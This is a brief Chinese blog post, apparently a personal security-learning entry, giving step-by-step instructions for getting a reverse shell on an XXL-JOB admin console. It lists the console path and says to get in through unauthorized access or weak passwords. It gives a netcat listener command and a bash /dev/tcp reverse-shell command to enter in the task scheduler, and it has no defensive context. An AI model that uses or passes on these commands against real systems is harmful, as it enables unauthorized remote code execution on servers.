Cyber Security-Day24(实战之反弹Shell漏洞原理及方法)
1.首先锁定漏洞,在我们通过指纹或者一些特征我们可以获得一些敏感资产:
2.我们在当前url后边加+/xxl-job-admin/
3.使用我们监听服务器去监听指定端口:比如9001
nc -lvnp 9001
4.通过未授权或者弱口令进入到任务后台在任务调度里边:
输入反弹服务器shell的命令:
0<&196;exec 196<>/dev/tcp/192.168.40.129/9001; sh <&196 >&196 2>&196
监听到服务上线,成功getshell;
本文作者:Arrest
本文链接:https://www.cnblogs.com/arrest/articles/16617544.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步